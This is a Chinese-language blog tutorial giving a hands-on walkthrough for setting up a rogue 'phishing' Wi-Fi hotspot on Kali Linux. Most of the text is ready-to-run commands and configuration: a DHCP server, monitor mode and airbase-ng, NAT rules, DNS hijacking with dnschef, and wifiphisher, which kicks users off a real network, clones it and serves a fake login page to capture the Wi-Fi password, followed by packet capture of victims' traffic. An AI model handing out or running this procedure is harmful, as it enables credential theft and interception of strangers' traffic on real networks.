電子證據 利用Kali進行wifi釣魚實戰詳細教程

電子證據 利用Kali進行wifi釣魚實戰詳細教程

一、 Kali系統安裝和必要軟件安裝:

二、利用kali建立釣魚wifi:

建立熱點

工具:isc-dhcp-server ;Aircrack-ng套件;iptables

isc-dhcp-server上面已裝,其他的kali自帶。

shell輸入:gedit /etc/dhcp/dhcpd.conf #意思同上,gedit是打開文件命令,如沒有這個文件,則創建。
寫入如下內容:
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

這裏以10.0.0.1作爲網關和dns服務器地址。

然後我們處理無線網卡

ifconfig wlan1 down #wlan1是你的網卡 這裏意思是關閉wlan1網卡
iwconfig wlan1 mode monitor #設置wlan1網卡爲監聽模式
ifconfig wlan1 up #打開wlan1網卡
airmon-ng start wlan1 #啓動wlan1網卡的監聽模式

上述命令可以防止出現:Error: Got channel -1, expected a value > 0.

然後用airbase建立熱點
airbase-ng -e Fishing -c 11 wlan1 #創建名爲Fishing的熱點,Fishing 自己改。

熱點的網絡流量會被虛擬到at0這塊網卡上面

ifconfig at0 up #啓用at0這塊網卡
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #在at0上配置10.0.0.1的ip地址及24位掩碼
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #添加路由
echo 1 > /proc/sys/net/ipv4/ip_forward #打開ip轉發

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start #開啓 dhcp

然後可以試着用手機連接,應該可以連上但上不了網

於是配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #對eth0進行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把無線網卡流量轉發到有線網卡(或者什麼能上網的網卡)上面
iptables -A FORWARD -p tcp –(兩個-)syn -s 10.0.0.0/24 -j TCPMSS –(兩個-)set-mss 1356 #修改最大報文段長度

注意那第三個命令調整MSS,不加後果很嚴重(我就一直死在這裏)

(這裏可能還是DNS錯誤,請看後文中的dns代理服務器搭建)

劫持DNS

工具:dnschef

過程:

dnschef -i 10.0.0.1 –nameserver 61.128.128.68 #以ip 10.0.0.1建立dns,對於所有請求轉發到61.128.128.68進行解析。

然後就可以用wireshark等工具抓包啦!

三、wifiphisher:

(要買一個無線網卡,淘寶23元一個,團購免郵費)

這是一個wifi攻擊腳本,詳細介紹地址:https://github.com/sophron/wifiphisher

先,我們來下載wifiphisher:

在shell框裏輸入命令:
git clone https://github.com/sophron/wifiphisher.git

等待下載完畢,然後你可以在你下載的目錄下看見wifiphisher這個文件夾。然後在這個文件夾運行 shell.

輸入命令:python bin/wifiphisher
如果是第一次運行腳本的話,它可能會出現提示安裝hostpad的信息,鍵入Y繼續安裝即可。

完成的時候,再次運行Wifiphisher腳本。

這次將運行8080和433端口的Web服務器,然後開始搜索附近的Wi-Fi網絡。

等待搜索完成,我們會發現一系列Wi-Fi網絡名。

然後按Ctrl+C 選擇攻擊的wifi

出現1、2、3三種模式,這三種模式代表發送不同的驗證頁面給連接的用戶,具體的頁面文件在wifiphisher目錄下的 attack page中。也可以自己寫一個。

敲下回車,Wifiphisher會顯示正在使用的界面,還有正被攻擊及複製的AP所在的SSID。

然後已連接件被攻擊wifi的用戶會被強制斷開,wifiphisher會copy這個被攻擊的wifi,做一個僞裝wifi(原理就如第二步),然後斷開的用戶將會再搜索到的是這個僞裝wifi,當他們連接這個wifi時會接受到一個驗證頁面(3種模式有3種不同的頁面),然後會要求用戶輸入密碼,當用戶輸入密碼提交後,你將會看見這個密碼。

我在這裏就失敗了…我的情況是:當用戶提交的密碼給我後,他們不是連上我的僞裝wifi,而是wifiphisher直接關掉了…原因不明…

如果他們連上這個僞裝wifi,你就可以用wireshark等工具進行抓包啦~~!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章